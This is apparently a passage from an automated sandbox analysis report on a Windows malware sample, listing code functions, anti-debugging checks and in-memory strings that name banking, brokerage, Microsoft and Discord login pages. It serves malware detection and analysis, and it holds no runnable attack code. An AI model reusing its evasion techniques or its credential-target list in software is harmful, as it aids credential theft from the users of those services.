            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 2_2_004F07DA GetSystemInfo,2_2_004F07DA
            Source: 281B196J.11.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696503903~
            Source: 281B196J.11.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696503903
            Source: typeperf.exe, 0000000B.00000002.3739404042.0000000007699000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ice.comVMware20,11696503903s
            Source: 281B196J.11.drBinary or memory string: tasks.office.comVMware20,11696503903o
            Source: 281B196J.11.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696503903z
            Source: typeperf.exe, 0000000B.00000002.3739404042.0000000007699000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,1169650?!$Ot
            Source: 281B196J.11.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696503903^
            Source: 281B196J.11.drBinary or memory string: www.interactivebrokers.comVMware20,11696503903}
            Source: 281B196J.11.drBinary or memory string: trackpan.utiitsl.comVMware20,11696503903h
            Source: 281B196J.11.drBinary or memory string: microsoft.visualstudio.comVMware20,11696503903x
            Source: typeperf.exe, 0000000B.00000002.3739404042.0000000007699000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,116
            Source: 281B196J.11.drBinary or memory string: bankofamerica.comVMware20,11696503903x
            Source: 281B196J.11.drBinary or memory string: Interactive Brokers - HKVMware20,11696503903]
            Source: 281B196J.11.drBinary or memory string: global block list test formVMware20,11696503903
            Source: 281B196J.11.drBinary or memory string: secure.bankofamerica.comVMware20,11696503903|UE
            Source: 281B196J.11.drBinary or memory string: ms.portal.azure.comVMware20,11696503903
            Source: 281B196J.11.drBinary or memory string: interactivebrokers.comVMware20,11696503903
            Source: 281B196J.11.drBinary or memory string: account.microsoft.com/profileVMware20,11696503903u
            Source: 281B196J.11.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696503903
            Source: zIlFieNVyhhCXAVrseNWP.exe, 0000000D.00000002.3734976892.0000000000FAF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^
            Source: 281B196J.11.drBinary or memory string: AMC password management pageVMware20,11696503903
            Source: 281B196J.11.drBinary or memory string: turbotax.intuit.comVMware20,11696503903t
            Source: 281B196J.11.drBinary or memory string: Canara Transaction PasswordVMware20,11696503903}
            Source: 281B196J.11.drBinary or memory string: Canara Transaction PasswordVMware20,11696503903x
            Source: 281B196J.11.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696503903
            Source: 281B196J.11.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696503903
            Source: 281B196J.11.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696503903p
            Source: 281B196J.11.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696503903n
            Source: 281B196J.11.drBinary or memory string: outlook.office365.comVMware20,11696503903t
            Source: 281B196J.11.drBinary or memory string: outlook.office.comVMware20,11696503903s
            Source: 281B196J.11.drBinary or memory string: netportal.hdfcbank.comVMware20,11696503903
            Source: 281B196J.11.drBinary or memory string: interactivebrokers.co.inVMware20,11696503903d
            Source: 281B196J.11.drBinary or memory string: dev.azure.comVMware20,11696503903j
            Source: 281B196J.11.drBinary or memory string: discord.comVMware20,11696503903f
            Source: 281B196J.11.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696503903
            Source: C:\Users\user\Desktop\BMhDm7YW62.exeAPI call chain: ExitProcess graph end nodegraph_0-3463
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_004173A3 LdrLoadDll,5_2_004173A3
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 2_2_0042093F EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,2_2_0042093F
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 2_2_004F005F mov eax, dword ptr fs:[00000030h]2_2_004F005F
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 2_2_004F017B mov eax, dword ptr fs:[00000030h]2_2_004F017B
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 2_2_004F0109 mov eax, dword ptr fs:[00000030h]2_2_004F0109
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 2_2_004F013E mov eax, dword ptr fs:[00000030h]2_2_004F013E
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AF80A8 mov eax, dword ptr fs:[00000030h]5_2_00AF80A8
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B260B8 mov eax, dword ptr fs:[00000030h]5_2_00B260B8
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B260B8 mov ecx, dword ptr fs:[00000030h]5_2_00B260B8
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A6208A mov eax, dword ptr fs:[00000030h]5_2_00A6208A
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A5A0E3 mov ecx, dword ptr fs:[00000030h]5_2_00A5A0E3
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE60E0 mov eax, dword ptr fs:[00000030h]5_2_00AE60E0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A680E9 mov eax, dword ptr fs:[00000030h]5_2_00A680E9
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A5C0F0 mov eax, dword ptr fs:[00000030h]5_2_00A5C0F0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AA20F0 mov ecx, dword ptr fs:[00000030h]5_2_00AA20F0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE20DE mov eax, dword ptr fs:[00000030h]5_2_00AE20DE
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A5A020 mov eax, dword ptr fs:[00000030h]5_2_00A5A020
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A5C020 mov eax, dword ptr fs:[00000030h]5_2_00A5C020
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AF6030 mov eax, dword ptr fs:[00000030h]5_2_00AF6030
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE4000 mov ecx, dword ptr fs:[00000030h]5_2_00AE4000
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B02000 mov eax, dword ptr fs:[00000030h]5_2_00B02000
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A7E016 mov eax, dword ptr fs:[00000030h]5_2_00A7E016
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A8C073 mov eax, dword ptr fs:[00000030h]5_2_00A8C073
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A62050 mov eax, dword ptr fs:[00000030h]5_2_00A62050
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE6050 mov eax, dword ptr fs:[00000030h]5_2_00AE6050
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AA0185 mov eax, dword ptr fs:[00000030h]5_2_00AA0185
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B04180 mov eax, dword ptr fs:[00000030h]5_2_00B04180
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE019F mov eax, dword ptr fs:[00000030h]5_2_00AE019F
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A5A197 mov eax, dword ptr fs:[00000030h]5_2_00A5A197
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B1C188 mov eax, dword ptr fs:[00000030h]5_2_00B1C188
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A901F8 mov eax, dword ptr fs:[00000030h]5_2_00A901F8
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B361E5 mov eax, dword ptr fs:[00000030h]5_2_00B361E5
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B261C3 mov eax, dword ptr fs:[00000030h]5_2_00B261C3
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00ADE1D0 mov eax, dword ptr fs:[00000030h]5_2_00ADE1D0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00ADE1D0 mov ecx, dword ptr fs:[00000030h]5_2_00ADE1D0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A90124 mov eax, dword ptr fs:[00000030h]5_2_00A90124
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B20115 mov eax, dword ptr fs:[00000030h]5_2_00B20115
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B0A118 mov ecx, dword ptr fs:[00000030h]5_2_00B0A118
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B0A118 mov eax, dword ptr fs:[00000030h]5_2_00B0A118
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AF4144 mov eax, dword ptr fs:[00000030h]5_2_00AF4144
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AF4144 mov ecx, dword ptr fs:[00000030h]5_2_00AF4144
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A66154 mov eax, dword ptr fs:[00000030h]5_2_00A66154
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A5C156 mov eax, dword ptr fs:[00000030h]5_2_00A5C156
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AF8158 mov eax, dword ptr fs:[00000030h]5_2_00AF8158
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A702A0 mov eax, dword ptr fs:[00000030h]5_2_00A702A0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AF62A0 mov eax, dword ptr fs:[00000030h]5_2_00AF62A0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AF62A0 mov ecx, dword ptr fs:[00000030h]5_2_00AF62A0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE0283 mov eax, dword ptr fs:[00000030h]5_2_00AE0283
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A9E284 mov eax, dword ptr fs:[00000030h]5_2_00A9E284
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A702E1 mov eax, dword ptr fs:[00000030h]5_2_00A702E1
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A6A2C3 mov eax, dword ptr fs:[00000030h]5_2_00A6A2C3
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A5823B mov eax, dword ptr fs:[00000030h]5_2_00A5823B
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B10274 mov eax, dword ptr fs:[00000030h]5_2_00B10274
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B10274 mov eax, dword ptr fs:[00000030h]5_2_00B10274
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B10274 mov eax, dword ptr fs:[00000030h]5_2_00B10274
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B10274 mov eax, dword ptr fs:[00000030h]5_2_00B10274
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B10274 mov eax, dword ptr fs:[00000030h]5_2_00B10274
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B10274 mov eax, dword ptr fs:[00000030h]5_2_00B10274
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B10274 mov eax, dword ptr fs:[00000030h]5_2_00B10274
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B10274 mov eax, dword ptr fs:[00000030h]5_2_00B10274
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B10274 mov eax, dword ptr fs:[00000030h]5_2_00B10274
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B10274 mov eax, dword ptr fs:[00000030h]5_2_00B10274
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B10274 mov eax, dword ptr fs:[00000030h]5_2_00B10274
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B10274 mov eax, dword ptr fs:[00000030h]5_2_00B10274
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A64260 mov eax, dword ptr fs:[00000030h]5_2_00A64260
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A64260 mov eax, dword ptr fs:[00000030h]5_2_00A64260
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A64260 mov eax, dword ptr fs:[00000030h]5_2_00A64260
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A5826B mov eax, dword ptr fs:[00000030h]5_2_00A5826B
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE8243 mov eax, dword ptr fs:[00000030h]5_2_00AE8243
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE8243 mov ecx, dword ptr fs:[00000030h]5_2_00AE8243
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A5A250 mov eax, dword ptr fs:[00000030h]5_2_00A5A250
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A66259 mov eax, dword ptr fs:[00000030h]5_2_00A66259
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A8438F mov eax, dword ptr fs:[00000030h]5_2_00A8438F
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A8438F mov eax, dword ptr fs:[00000030h]5_2_00A8438F
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A5E388 mov eax, dword ptr fs:[00000030h]5_2_00A5E388
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A5E388 mov eax, dword ptr fs:[00000030h]5_2_00A5E388
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A5E388 mov eax, dword ptr fs:[00000030h]5_2_00A5E388
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A58397 mov eax, dword ptr fs:[00000030h]5_2_00A58397
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A58397 mov eax, dword ptr fs:[00000030h]5_2_00A58397
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A58397 mov eax, dword ptr fs:[00000030h]5_2_00A58397
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A703E9 mov eax, dword ptr fs:[00000030h]5_2_00A703E9
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A703E9 mov eax, dword ptr fs:[00000030h]5_2_00A703E9
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A703E9 mov eax, dword ptr fs:[00000030h]5_2_00A703E9
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A703E9 mov eax, dword ptr fs:[00000030h]5_2_00A703E9
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A703E9 mov eax, dword ptr fs:[00000030h]5_2_00A703E9
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A703E9 mov eax, dword ptr fs:[00000030h]5_2_00A703E9
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A703E9 mov eax, dword ptr fs:[00000030h]5_2_00A703E9
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A703E9 mov eax, dword ptr fs:[00000030h]5_2_00A703E9
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A963FF mov eax, dword ptr fs:[00000030h]5_2_00A963FF
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A7E3F0 mov eax, dword ptr fs:[00000030h]5_2_00A7E3F0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A7E3F0 mov eax, dword ptr fs:[00000030h]5_2_00A7E3F0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A7E3F0 mov eax, dword ptr fs:[00000030h]5_2_00A7E3F0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B043D4 mov eax, dword ptr fs:[00000030h]5_2_00B043D4
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B043D4 mov eax, dword ptr fs:[00000030h]5_2_00B043D4
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A683C0 mov eax, dword ptr fs:[00000030h]5_2_00A683C0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A683C0 mov eax, dword ptr fs:[00000030h]5_2_00A683C0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A683C0 mov eax, dword ptr fs:[00000030h]5_2_00A683C0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A683C0 mov eax, dword ptr fs:[00000030h]5_2_00A683C0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A6A3C0 mov eax, dword ptr fs:[00000030h]5_2_00A6A3C0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A6A3C0 mov eax, dword ptr fs:[00000030h]5_2_00A6A3C0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A6A3C0 mov eax, dword ptr fs:[00000030h]5_2_00A6A3C0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A6A3C0 mov eax, dword ptr fs:[00000030h]5_2_00A6A3C0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A6A3C0 mov eax, dword ptr fs:[00000030h]5_2_00A6A3C0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A6A3C0 mov eax, dword ptr fs:[00000030h]5_2_00A6A3C0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE63C0 mov eax, dword ptr fs:[00000030h]5_2_00AE63C0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B1C3CD mov eax, dword ptr fs:[00000030h]5_2_00B1C3CD
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A9A30B mov eax, dword ptr fs:[00000030h]5_2_00A9A30B
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A9A30B mov eax, dword ptr fs:[00000030h]5_2_00A9A30B
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A9A30B mov eax, dword ptr fs:[00000030h]5_2_00A9A30B
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A5C310 mov ecx, dword ptr fs:[00000030h]5_2_00A5C310
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A80310 mov ecx, dword ptr fs:[00000030h]5_2_00A80310
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B0437C mov eax, dword ptr fs:[00000030h]5_2_00B0437C
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B2A352 mov eax, dword ptr fs:[00000030h]5_2_00B2A352
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B08350 mov ecx, dword ptr fs:[00000030h]5_2_00B08350
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE2349 mov eax, dword ptr fs:[00000030h]5_2_00AE2349
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE2349 mov eax, dword ptr fs:[00000030h]5_2_00AE2349
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE2349 mov eax, dword ptr fs:[00000030h]5_2_00AE2349
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE2349 mov eax, dword ptr fs:[00000030h]5_2_00AE2349
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE2349 mov eax, dword ptr fs:[00000030h]5_2_00AE2349
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE2349 mov eax, dword ptr fs:[00000030h]5_2_00AE2349
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE2349 mov eax, dword ptr fs:[00000030h]5_2_00AE2349
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE2349 mov eax, dword ptr fs:[00000030h]5_2_00AE2349
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE2349 mov eax, dword ptr fs:[00000030h]5_2_00AE2349
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE2349 mov eax, dword ptr fs:[00000030h]5_2_00AE2349
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE2349 mov eax, dword ptr fs:[00000030h]5_2_00AE2349
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE2349 mov eax, dword ptr fs:[00000030h]5_2_00AE2349
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE2349 mov eax, dword ptr fs:[00000030h]5_2_00AE2349
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE2349 mov eax, dword ptr fs:[00000030h]5_2_00AE2349
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE2349 mov eax, dword ptr fs:[00000030h]5_2_00AE2349
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE035C mov eax, dword ptr fs:[00000030h]5_2_00AE035C
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE035C mov eax, dword ptr fs:[00000030h]5_2_00AE035C
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE035C mov eax, dword ptr fs:[00000030h]5_2_00AE035C
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE035C mov ecx, dword ptr fs:[00000030h]5_2_00AE035C
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE035C mov eax, dword ptr fs:[00000030h]5_2_00AE035C
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE035C mov eax, dword ptr fs:[00000030h]5_2_00AE035C
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A664AB mov eax, dword ptr fs:[00000030h]5_2_00A664AB
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A944B0 mov ecx, dword ptr fs:[00000030h]5_2_00A944B0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AEA4B0 mov eax, dword ptr fs:[00000030h]5_2_00AEA4B0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A604E5 mov ecx, dword ptr fs:[00000030h]5_2_00A604E5
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A5C427 mov eax, dword ptr fs:[00000030h]5_2_00A5C427
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A5E420 mov eax, dword ptr fs:[00000030h]5_2_00A5E420
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A5E420 mov eax, dword ptr fs:[00000030h]5_2_00A5E420
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A5E420 mov eax, dword ptr fs:[00000030h]5_2_00A5E420
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE6420 mov eax, dword ptr fs:[00000030h]5_2_00AE6420
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE6420 mov eax, dword ptr fs:[00000030h]5_2_00AE6420
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE6420 mov eax, dword ptr fs:[00000030h]5_2_00AE6420
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE6420 mov eax, dword ptr fs:[00000030h]5_2_00AE6420
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE6420 mov eax, dword ptr fs:[00000030h]5_2_00AE6420
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE6420 mov eax, dword ptr fs:[00000030h]5_2_00AE6420
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE6420 mov eax, dword ptr fs:[00000030h]5_2_00AE6420
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A9A430 mov eax, dword ptr fs:[00000030h]5_2_00A9A430
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A98402 mov eax, dword ptr fs:[00000030h]5_2_00A98402
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A98402 mov eax, dword ptr fs:[00000030h]5_2_00A98402
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A98402 mov eax, dword ptr fs:[00000030h]5_2_00A98402
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AEC460 mov ecx, dword ptr fs:[00000030h]5_2_00AEC460
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A8A470 mov eax, dword ptr fs:[00000030h]5_2_00A8A470
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A8A470 mov eax, dword ptr fs:[00000030h]5_2_00A8A470
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A8A470 mov eax, dword ptr fs:[00000030h]5_2_00A8A470
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A9E443 mov eax, dword ptr fs:[00000030h]5_2_00A9E443
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A9E443 mov eax, dword ptr fs:[00000030h]5_2_00A9E443
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A9E443 mov eax, dword ptr fs:[00000030h]5_2_00A9E443
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A9E443 mov eax, dword ptr fs:[00000030h]5_2_00A9E443
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A9E443 mov eax, dword ptr fs:[00000030h]5_2_00A9E443
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A9E443 mov eax, dword ptr fs:[00000030h]5_2_00A9E443
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A9E443 mov eax, dword ptr fs:[00000030h]5_2_00A9E443
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A9E443 mov eax, dword ptr fs:[00000030h]5_2_00A9E443
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A8245A mov eax, dword ptr fs:[00000030h]5_2_00A8245A
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A5645D mov eax, dword ptr fs:[00000030h]5_2_00A5645D
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE05A7 mov eax, dword ptr fs:[00000030h]5_2_00AE05A7
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE05A7 mov eax, dword ptr fs:[00000030h]5_2_00AE05A7
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE05A7 mov eax, dword ptr fs:[00000030h]5_2_00AE05A7
